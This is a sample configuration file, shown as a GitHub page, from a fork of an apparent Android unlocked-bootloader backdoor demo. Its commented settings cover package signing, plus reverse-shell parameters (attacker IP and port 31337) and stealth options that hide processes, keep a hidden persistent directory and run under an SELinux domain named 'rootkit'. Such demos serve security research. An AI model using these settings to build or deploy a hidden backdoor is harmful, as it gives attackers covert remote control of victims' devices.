forked from LuigiVampa92/unlocked-bootloader-backdoor-demo
-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathconfig.prop.sample
54 lines (37 loc) · 1.54 KB
/
config.prop.sample
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
##########################################################
# All variables in config.prop are optional
# Removing or leaving them blank will keep default values
##########################################################
# The version name of package
#version=string
# Output path. Default: out
#outdir=string
#####################################################
# Signing configs for signing zips and APKs
# These 4 variables have to be either all set or not
#####################################################
# Path to keystore file
# keyStore=keystore/key.keystore
# Keystore password
# keyStorePass=123456
# The desired key alias in the keystore
# keyAlias=my_key
# Password of specified key alias
# keyPass=123456
#####################################################
# Reverse shell parameters: LHOST and LPORT
# (passed as arguments for reverse ssh or other payloads)
# (see native/jni/payload/executor.cpp)
#####################################################
# lport=31337 # Attacker's (or local bind) port. Default: 31337
# lhost=192.168.0.10 # Attacker's IP. If not present, will listen on LPORT
#####################################################
# Execution and stealth parameters
#####################################################
# Create persistent dir at /data/adb/.fura ?
# create_persist_dir=1
# Use bind mounts to hide processes (alternative method if SELinux is permissive or off)
# (Note: mounts are exposed to `mount` command)
# hide_process_bind=1
# Domain to run within (arbitrary name)
# selinux_domain=rootkit